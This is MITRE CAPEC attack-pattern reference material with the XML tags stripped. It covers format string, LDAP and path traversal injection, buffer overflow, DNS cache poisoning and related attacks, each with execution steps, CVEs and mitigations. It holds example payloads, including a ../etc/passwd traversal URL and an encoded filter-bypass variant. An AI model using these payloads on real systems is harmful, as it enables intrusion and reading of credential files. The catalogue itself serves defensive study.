Determine the user-controllable input susceptible to format string injection. For each user-controllable input that the attacker suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.
Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters.
env-Web
Attacker receives normal response from server.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Attacker receives an abnormal message (let's say with a partial dump of the memory) from the application which indicates that the format string was successfully manipulated.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
At least one user-controllable input susceptible to injection found.
No user-controllable input susceptible to injection found.
Search for and report format string injection indicators such as the use of %s, %n, %d, etc. in submitted user input
Refrain from using format strings when not necessary, for example fprintf(str) can be replaced by fputs(str), etc.
Try to exploit the Format String Injection vulnerability
After determining that a given input is vulnerable to format string injection, hypothesize what the underlying usage looks like and the associated constraints.
Insert various formatting characters to read or write the memory, e.g. overwrite return address, etc.
env-Web
Probing via format character injection was successful in identifying vulnerable input.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Probing via format character injection failed in identifying vulnerable input.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Attacker achieves goal of reading or writing the memory, manipulating the formatting string
Attacker unable to exploit the format string injection vulnerability
The target application must accept a strings as user input, fail to sanitize string formatting characters in the user input, and process this string using functions that interpret string formatting characters.
High
High
Injection
Untrusted search path vulnerability in the add_filename_to_string function in intl/gettext/loadmsgcat.c for Elinks 0.11.1 allows local users to cause Elinks to use an untrusted gettext message catalog (.po file) in a "../po" directory, which can be leveraged to conduct format string attacks.
CVE-2007-2027
High
In order to discover format string vulnerabilities it takes only low skill, however, converting this discovery into a working exploit requires advanced knowledge on the part of the attacker.
No special resources are required beyond the ability to provide string input to the target.
Limit the usage of formatting string functions.
Strong input validation - All user-controllable input must be validated and filtered for illegal formatting characters.
Integrity
Modify memory
Confidentiality
Read memory
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Gain privileges / assume identity
Execute unauthorized code or commands
Run Arbitrary Code
Bypass protection mechanism
User-controllable input used as formatting string.
Formatting characters associated with malicious string content intended to reveal information or modify the memory.
Application (server, client, etc.)
134
Targeted
20
Targeted
74
Targeted
133
Targeted
1000
Attack Pattern
ChildOf
137
User-controllable input shall not be used directly inside a formatting string function e.g., fprintf(user_controllable). Special formatting characters in user-controllable input must be escaped before use by the application in a formatting string function.
Ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings.
Reluctance to Trust
Defense in Depth
Never Use Input as Part of a Directive to any Internal Component
Use Authorization Mechanisms Correctly
Penetration
Exploitation
High
High
Medium
Client-Server
n-Tier
All
All
All
Hal Burch
Brendan Saulsbury
FIO30-C. Exclude user input from format strings
CERT
May 2011
https://www.securecoding.cert.org/confluence/display/seccode/FIO30-C.+Exclude+user+input+from+format+strings
Robert Auger
WASC Threat Classification 2.0
WASC-06 - Format String
The Web Application Security Consortium (WASC)
Feb 2009
http://projects.webappsec.org/Format-String
Fortify
The OWASP Application Security Desk Reference
Format String
The Open Web Application Security Project (OWASP)
2010
https://www.owasp.org/index.php/Format_String
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates or crafts an LDAP query for the purpose of undermining the security of the target. Some applications use user input to create LDAP queries that are processed by an LDAP server. For example, a user might provide their username during authentication and the username might be inserted in an LDAP query during the authentication process. An attacker could use this input to inject additional commands into an LDAP query that could disclose sensitive information. For example, entering a * in the aforementioned query might return information about all users on the system. This attack is very similar to an SQL injection attack in that it manipulates a query to gather additional information or coerce a particular return value.
Survey application
The attacker takes an inventory of the entry points of the application.
Spider web sites for all available links
env-Web
Sniff network communications with application using a utility such as WireShark.
env-All
At least one data input to application identified.
No inputs to application identified. Note that just because no inputs are identified does not mean that the application will not accept any.
Determine user-controllable input susceptible to LDAP injection
For each user-controllable input that the attacker suspects is vulnerable to LDAP injection, attempt to inject characters that have special meaning in LDAP (such as a single quote character, etc.). The goal is to create a LDAP query with an invalid syntax
Use web browser to inject input through text fields or through HTTP GET parameters
env-Web
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
env-Web
Use modified client (modified by reverse engineering) to inject input.
env-Web
Attacker receives normal response from server.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Attacker receives an error message from target indicating a problem with the LDAP Query
env-Web env-CommProtocol env-ClientServer
Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException)
env-Web env-CommProtocol env-ClientServer
At least user controllable data input to application identified.
No inputs susceptible to injection into the application were identified..
Search for and alert on unexpected LDAP constructs in application logs, e.g. (email=*)) etc.).
Input validation of user-controlled data before including it in a LDAP query
Try to exploit the LDAP injection vulnerability
After determining that a given input is vulnerable to LDAP Injection, hypothesize what the underlying query looks like. Possibly using a tool, iteratively try to add logic to the query to extract information from the LDAP, or to modify or delete information in the LDAP.
Add logic to the LDAP query to change the meaning of that command. Automated tools could be used to generate the LDAP injection strings.
env-Web
Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, or other HTTP header.
env-Web
Attacker receives normal response from server.
env-Web env-Peer2Peer env-CommProtocol env-ClientServer
Probing via LDAP syntax injection was successful in identifying vulnerable input.
env-Web env-CommProtocol env-ClientServer
Probing via LDAP syntax injection failed in identifying vulnerable input.
env-Web env-CommProtocol env-ClientServer
Attacker achieves goal of unauthorized information access, etc.
Attacker unable to exploit LDAP Injection vulnerability.
Search for and alert on unexpected LDAP constructs in application logs, e.g. (email=*)) etc.).
Input validation of user-controlled data before including it in a LDAP query
The target application must accept a string as user input, fail to sanitize characters that have a special meaning in LDAP queries in the user input, and insert the user-supplied string in an LDAP query which is then processed.
High
High
Injection
PowerDNS before 2.9.18, when running with an LDAP backend, does not properly escape LDAP queries, which allows remote attackers to cause a denial of service (failure to answer ldap questions) and possibly conduct an LDAP injection attack.
CVE-2005-2301
Medium
Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as LDAP content.
Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the LDAP or application.
Availability
DoS: crash / exit / restart
Availability
DoS: instability
Integrity
Modify files or directories
Confidentiality
Read files or directories
Integrity
Modify application data
Confidentiality
Read application data
Authorization
Execute unauthorized code or commands
Run Arbitrary Code
Accountability
Authentication
Authorization
Non-Repudiation
Gain privileges / assume identity
Access_Control
Authorization
Bypass protection mechanism
User-controllable input used as part of LDAP queries: This may include input fields on web forms, data in user-accessible files or even command-line parameters.
LDAP statement intended to reveal information or run malicious code
Back-end LDAP directory tree
When malicious LDAP content is executed by the LDAP engine, it can lead to arbitrary queries being executed, causing disclosure of information, unauthorized access, privilege escalation and possibly system compromise.
77
Targeted
90
Targeted
20
Targeted
1000
Attack Pattern
ChildOf
248
Special characters in user-controllable input must be escaped before use by the application.
Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the LDAP structure.
Reluctance to Trust
Defense in Depth
Failing Securely
Handle All Errors Safely
Never Use Input as Part of a Directive to any Internal Component
Penetration
Exploitation
High
High
High
Client-Server
n-Tier
All
All
All
WASC Threat Classification 2.0
WASC-29 - LDAP Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/LDAP-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits weaknesses in input validation by manipulating the content of request parameters for the purpose of undermining the security of the target. Some parameter encodings use text characters as separators. For example, parameters in a HTTP GET message are encoded as name-value pairs separated by an ampersand (&). If an attacker can supply text strings that are used to fill in these parameters, then they can inject special characters used in the encoding scheme to add or modify parameters. For example, if user input is fed directly into an HTTP GET request and the user provides the value "myInput&new_param=myValue", then the input parameter is set to myInput, but a new parameter (new_param) is also added with a value of myValue. This can significantly change the meaning of the query that is processed by the server. Any encoding scheme where parameters are identified and separated by text characters is potentially vulnerable to this attack - the HTTP GET encoding used above is just one example.
The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.
The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed.
Medium
No special resources are required beyond the ability to provide string input to the target.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker supplies a value to the target application which is then used by reflection methods to identify a class, method, or field. For example, in the Java programming language the reflection libraries permit an application to inspect, load, and invoke classes and their components by name. If an attacker can control the input into these methods including the name of the class/method/field or the parameters passed to methods, they can cause the targeted application to invoke incorrect methods, read random fields, or even to load and utilize malicious classes that the attacker created. This can lead to the application revealing sensitive information, returning incorrect results, or even having the attacker take control of the targeted application.
The target application must utilize reflection libraries and allow users to directly control the parameters to these methods.
Very High
No special resources are required for most forms of this attack beyond the ability to provide input to the target that is used to populate parameters for reflection methods. If the attacker can host classes where the target can invoke them, more powerful variants of this attack are possible.
1000
Attack Pattern
ChildOf
137
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
Survey application
Using a browser or an automated tool, an attacker follows all public links on a web site. He records all the links he finds. He picks out the URL parameters that may related to access to files.
Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
env-Web
Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
env-Web
Use a browser to manually explore the website and analyze how it is constructed. Many browser's plug-in are available to facilitate the analysis or automate the URL discovery.
env-Web
There are links that include parameters in URL.
env-Web
Using URL rewriting, parameters may be part of the URL path.
env-Web env-CommProtocol env-ClientServer
No parameters appear on the URL. Even though none appear, the web application may still use them if they are provided.
env-Web
Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible.
env-Web
A list of URLs, with their corresponding parameters is created by the attacker.
A list of application user interface entry fields is created by the attacker.
A list of resources accessed by the application is created by the attacker.
Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them).
Use CAPTCHA to prevent the use of the application by an automated tool.
Actively monitor the application and either deny or redirect requests from origins that appear to be automated.
Attempt variations on input parameters
Possibly using an automated tool, an attacker requests variations on the identified inputs. He sends parameters that include variations of payloads.
Use a list of probe strings as path traversal payload. Different strings may be used for different platforms. Strings contain relative path sequences such as "../".
env-Web
Use a proxy tool to record results of manual input of relative path traversal probes in known URLs.
env-Web
Attackers can access arbitrary files.
env-Web
The output of pages includes some error messages if file does not exist.
env-Web env-CommProtocol env-ClientServer
All context-sensitive characters are consistently re-encoded before being sent to the web browser.
env-Web env-CommProtocol env-ClientServer
The attacker's file path probe string is being reflected verbatim at some point in the web site (if not on the same page).
An error message or exception. Note that the system may leak information to the attackers in the error messages, e.g. "File Not Found", "File Access Restricted".
Monitor input to web servers, application servers, and other HTTP infrastructure (e.g., load balancers). Alert on standard relative path traversal probes. Use the same vulnerability catalogs that adversaries use.
Apply appropriate input validation to filter all user-controllable input.
Actively monitor the application and either deny or redirect requests from origins that appear to be generating path traversal probes.
Access, modify, or execute arbitrary files.
An attacker injects path traversal syntax into identified vulnerable inputs to cause inappropriate reading, writing or execution of files. An attacker could be able to read directories or files which they are normally not allowed to read. The attacker could also access data outside the web document root, or include scripts, source code and other kinds of files from external websites. Once the attacker accesses arbitrary files, he/she could also modify files. In particular situations, the attacker could also execute arbitrary code or system commands.
Manipulate file and its path by injecting relative path sequences (e.g. "../").
env-Web
Download files, modify files, or try to execute shell commands (with binary files).
env-Web
The attacker accesses the content of restricted files.
Apply appropriate input validation to filter all user-controllable input of path syntax.
Monitor server logs for unintended file access, modification and execution.
Apply appropriate input validation to filter all user-controllable input of path syntax
The target application must accept a string as user input, fail to sanitize combinations of characters in the input that have a special meaning in the context of path navigation, and insert the user-supplied string into path navigation commands.
High
High
Injection
The attacker uses relative path traversal to access files in the application. This is an example of accessing user's password file.
http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd
However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.
Then an attacker creates special payloads to bypass this filter:
http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd
When the application gets this input string, it will be the desired vector by the attacker.
Low
To inject the malicious payload in a web page
High
To bypass non trivial filters in the application
Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement
Implementation: Perform input validation for all remote content, including remote and user-generated content.
Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- whitelisting approach.
Implementation: Prefer working without user input when using file system calls
Implementation: Use indirect references rather than actual file names.
Implementation: Use possible permissions on file access when developing and deploying web applications.
Integrity
Modify files or directories
Confidentiality
Read files or directories
Execute unauthorized code or commands
Run Arbitrary Code
Bypass protection mechanism
Availability
DoS: crash / exit / restart
Availability
DoS: instability
User-controllable input into web parameters or post variables.
variations on "../../" characters and encoded varieties.
Web server processing of GET or POST content.
• Attackers may create or overwrite critical files.
• Execute unauthorized code or commands.
• Information Leakage of applications that attackers may read confidential files.
• Attackers may delete or corrupt some critical files or data that cause denial of service to legal users.
22
Targeted
20
Targeted
CVE-2010-0467
Newsletter module allows reading arbitrary files using "../" sequences.
CVE-2009-4581
PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function.
1000
Attack Pattern
ChildOf
126
Special characters in user-controllable input must be escaped before use by the application. Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application.
Penetration
Exploitation
High
High
Low
Client-Server
n-Tier
All
All
All
The OWASP Application Security Desk Reference
Path Traversal
The Open Web Application Security Project (OWASP)
2009
https://www.owasp.org/index.php/Path_Traversal
OWASP Testing Guide
Testing for Path Traversal (OWASP-AZ-001)
v3
The Open Web Application Security Project (OWASP)
2010
https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)
WASC Threat Classification 2.0
WASC-33 - Path Traversal
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/w/page/13246952/Path-Traversal
CAPEC Content Team
The MITRE Corporation
2014-06-23
This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
The attacker creates a custom hostile service
The attacker acquires information about the kind of client attaching to her hostile service to determine if it contains an exploitable buffer overflow vulnerability.
The attacker intentionally feeds malicious data to the client to exploit the buffer overflow vulnerability that she has uncovered.
The attacker leverages the exploit to execute arbitrary code or to cause a denial of service.
The targeted client software communicates with an external server.
The targeted client software has a buffer overflow vulnerability.
High
Medium
API Abuse
Injection
Attack Example: Buffer Overflow in Internet Explorer 4.0 Via EMBED Tag
Authors often use <EMBED> tags in HTML documents. For example
<EMBED TYPE="audio/midi" SRC="/path/file.mid" AUTOSTART="true">
If an attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.
Low
To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector.
High
Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.
The server may look like a valid server, but in reality it may be a hostile server aimed at fooling the client software. For instance the server can use honey pots and get the client to download malicious code.
Once engaged with the client, the hostile server may attempt to scan the client's host for open ports and potential vulnerabilities in the client software.
The hostile server may also attempt to install and run malicious code on the client software. That malicious code can be used to scan the client software for buffer overflow.
An example of indicator is when the client software crashes after executing code downloaded from a hostile server.
The client software should not install untrusted code from a non-authenticated server.
The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.
Perform input validation for length of buffer inputs.
Use a language or compiler that performs automatic bounds checking.
Use an abstraction library to abstract away risky APIs. Not a complete solution.
Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.
Ensure all buffer uses are consistently bounds-checked.
Use OS-level preventative functionality. Not a complete solution.
Confidentiality
Read memory
Integrity
Modify memory
Availability
DoS: resource consumption (memory)
Denial of Service
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Attacker-supplied data potentially containing malicious code.
When the function returns control to the main program, it jumps to the return address portion of the stack frame. Unfortunately that return address may have been overwritten by the overflowed buffer and the address may contain a call to a privileged command or to malicious code.
The most common are remote code execution or denial of service.
120
Targeted
353
Targeted
118
Targeted
119
Targeted
74
Targeted
20
Targeted
680
Targeted
697
Targeted
713
Targeted
1000
Attack Pattern
ChildOf
8
1000
Attack Pattern
ChildOf
100
Reluctance to Trust
Defense in Depth
Penetration
High
High
High
Client-Server
Other
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
Common Weakness Enumeration (CWE)
CWE-119: Buffer Errors
Draft
The MITRE Corporation
2007
http://cwe.mitre.org/data/definitions/119.html
CAPEC Content Team
The MITRE Corporation
2014-06-23
Some web applications require users to submit information through an ordered sequence of web forms. This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.
The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms.
Medium
No special resources are required for this attack.
1000
Attack Pattern
ChildOf
74
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.
Identify and explore caches
Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.
Run tools that check available entries in the cache.
env-All
Entries do not exist in the cache.
env-All
Applications or servers are not updated to new versions.
env-All
Entries exist in the cache.
env-Web
A list of server's information. No target entry found in the cache.
A list of browser's information. No target entry found in the cache.
The results show target entries in the cache.
Monitor network scans and examine system logs. The scans may be from unknown local IP or MAC address.
Cause specific data to be cached
An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.
Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
env-Web
Request that the attacker intercepts includes transaction ID.
env-All
The attacker successfully sends response before authorized server.
env-All
Transaction ID has been randomized.
env-Web env-CommProtocol env-ClientServer
The application or server cache has recorded correct table entry. In this case, the attacker needs to figure out a way to overwrite table entries to succeed
env-All
The attacker fails to send responses before authorized responses. In this case, the attacker needs to figure out a way to overwrite table entries to succeed
env-All
Any request of the targeted form results in the seeded response.
Any request of the targeted form results in the correct response and not the seeded response.
Monitor log file and see a large number of responses sent from the same host. This host may be manipulated by attacker.
Redirect users to malicious website
As the attacker succeeds in exploiting the vulnerability, he is able to manipulate and interpose malicious response data to targeted victim queries.
Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
env-Web
Man-in-the-Middle intercepts secure communication between two parties.
env-Web
Any request of the targeted form results in the seeded response.
Any request of the targeted form results in the correct response and not the seeded response.
Be less trusting of the information passed to them by other parties, and ignoring any records passed back which are not directly relevant to the query.
The attacker must be able to modify the value stored in a cache to match a desired value.
The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations.
High
High
Injection
DNS cache poisoning example
In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.
Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com
When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.
Medium
To overwrite/modify targeted cache
Configuration: Disable client side caching.
Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.
348
Targeted
345
Targeted
349
Targeted
346
Secondary
441
Secondary
1000
Category
ChildOf
210
1000
Attack Pattern
CanPrecede
89
Penetration
Exploitation
High
High
High
All
All
All
All
Wikipedia
DNS Cache Poisoning
The Wikimedia Foundation, Inc
2011-07-10
http://en.wikipedia.org/wiki/DNS_cache_poisoning
DNS Threats and DNS Weaknesses
DNS Threats & Weaknesses of the Domain Name System
DNSSEC
http://www.dnssec.net/dns-threats.php
Wikipedia
Arp Spoofing
The Wikimedia Foundation, Inc
2011-07-17
http://en.wikipedia.org/wiki/ARP_spoofing
CAPEC Content Team
The MITRE Corporation
2014-06-23
A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An attacker modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the attacker specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. Attackers can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.
Explore resolver caches
Check DNS caches on local DNS server and client's browser with DNS cache enabled.
Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
env-All
Figure out if the client's browser has DNS cache enabled.
env-All
Found no entry in the resolver cache
env-All
The results show target DNS entry in DNS server
env-All
A list of DNS server information. No target entry found in the resolver cache.
The results show target DNS entry in DNS server.
Network scans can be logged in system logs. The scans may be from unknown local IP address.
Attempt sending crafted records to DNS cache
A request is sent to the authoritative server for target website and wait for the iterative name resolver. An attacker sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.
Attacker must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
env-CommProtocol
If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives attacker enough time to guess transaction
env-CommProtocol
Attacker crafts DNS response with the same transaction ID as in the request. The attacker sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.
env-CommProtocol
DNS request that the attacker intercepts includes transaction ID.
env-All
The attacker successfully sends DNS response before authorized DNS server.
env-All
Transaction ID has been randomized.
env-All
The DNS server cache has recorded correct Name and IP address entry. In this case, the attacker needs to figure out a way to overwrite table entries to succeed
env-All
The attacker fails to send DNS response before authorized DNS server. In this case, the attacker needs to figure out a way to overwrite table entries to succeed
env-All
Any local machine that types names of the good server is redirected to a malicious server.
Any local machine that types names of the good server is not redirected to a malicious server.
Monitor log file and see a large number of DNS responses sent from the same host. This host may be manipulated by attacker.
Redirect users to malicious website
As the attacker succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.
Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
env-Web
Man-in-the-Middle intercepts secure communication between two parties.
env-Web
Any local machine that types names of the good server is redirected to a malicious server.
The attacker accepts the incoming SSL connection, decrypts it, reads all the traffic, and makes the same request via SSL to the original site.
Any local machine that types names of the good server is not redirected to a malicious server.
Upgrade BIND. Use latest version
Be less trusting of the information passed to them by other DNS servers, and ignoring any DNS records passed back which are not directly relevant to the query.
To greatly reduce the probability of successful DNS race attacks. Use source port randomization for DNS requests, cryptographically-secure random numbers.
A DNS cache must be vulnerable to some attack that allows the attacker to replace addresses in its lookup table.
Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions.
High
High
Injection
In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.
Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com
When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.
Medium
To overwrite/modify targeted DNS cache
The attacker must have the resources to modify the targeted cache. In addition, in most cases the attacker will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the attackers' goals.
Configuration: Make sure your DNS servers have been updated to the latest versions
Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.
Configuration: Disable client side DNS caching.
A vector specifically crafted to poison DNS cache, so that all traffic is redirected to an unintended destination.
DNS response
DNS server cache
Client's browser DNS cache
Any local machine that types names of the good server is redirected to a malicious server. This attack assists pharming attack when victim is fooled into entering sensitive data into supposedly trusted locations. The attacker could also accept the incoming SSL connection, decrypts it, reads all the traffic, and makes the same request via SSL to the original site.
348
Targeted
345
Targeted
349
Targeted
346
Secondary
441
Secondary
350
Secondary
CVE-2005-0877
Dnsmasq before 2.21 allows remote attackers to poison the DNS cache via answers to queries that were not made by Dnsmasq.
CVE-2004-1754
The DNS proxy (DNSd) for multiple Symantec Gateway Security products allows remote attackers to poison the DNS cache via a malicious DNS server query response that contains authoritative or additional records.
1000
Attack Pattern
ChildOf
141
1000
Attack Pattern
ChildOf
161
1000
Attack Pattern
CanPrecede
89
Penetration
Exploitation
High
High
High
All
All
All
All
Wikipedia
DNS Cache Poisoning
The Wikimedia Foundation, Inc
2011-07-10
http://en.wikipedia.org/wiki/DNS_cache_poisoning
DNS Threats and DNS Weaknesses
DNS Threats & Weaknesses of the Domain Name System
DNSSEC
http://www.dnssec.net/dns-threats.php
Vulnerability Note VU#800113
US CERT
2008-07-08
http://www.kb.cert.org/vuls/id/800113#pat
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker searches a targeted web site for web pages that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging pages, or otherwise predictable pages within the site tree. For example, if an attacker might be able to notice a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked. Using this, the attacker may be able to gain access to information that the targeted site did not intend to make public.
The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack.
Low
Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths.
1000
Attack Pattern
ChildOf
87
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker searches a targeted web site for web services that have not been publicized. Generally this involves mapping the published web site by spidering through all the published links and then attempt to access well-known debugging or logging services, or otherwise predictable services within the site tree. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.
The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack.
Low
Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths.
1000
Attack Pattern
ChildOf
87
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an attacker modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the attacker) in the message. This would prevent the recipient from realizing that a change occurred.
The attacker must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.
The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the attacker can intercept and modify it.
The checksum value must be computable using information known to the attacker. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack.
Medium
The attacker must be able to intercept and modify messages between the sender and recipient.
1000
Attack Pattern
ChildOf
148
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker corrupts or modifies the content of XML schema information passing between client and server for the purpose of undermining the security of the target. XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema. Possible attacks are denial of service attacks by modifying the Schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the attacker removes this attribute from the schema then documents create using the new grammar will lack this field, which may cause the processing application to enter an unexpected state or record incomplete data. In addition, manipulation of the data types described in the schema may affect the results of calculations taken by the document reader. For example, a float field could be changed to an int field. Finally, the attacker may change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might us a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).
The schema used by the target application must be improperly secured against unauthorized modification and manipulation.
High
Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema.
Design: Protect the schema against unauthorized modification.
Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document.
15
Targeted
472
Secondary
1000
Attack Pattern
ChildOf
271
CAPEC Content Team
The MITRE Corporation
2014-06-23
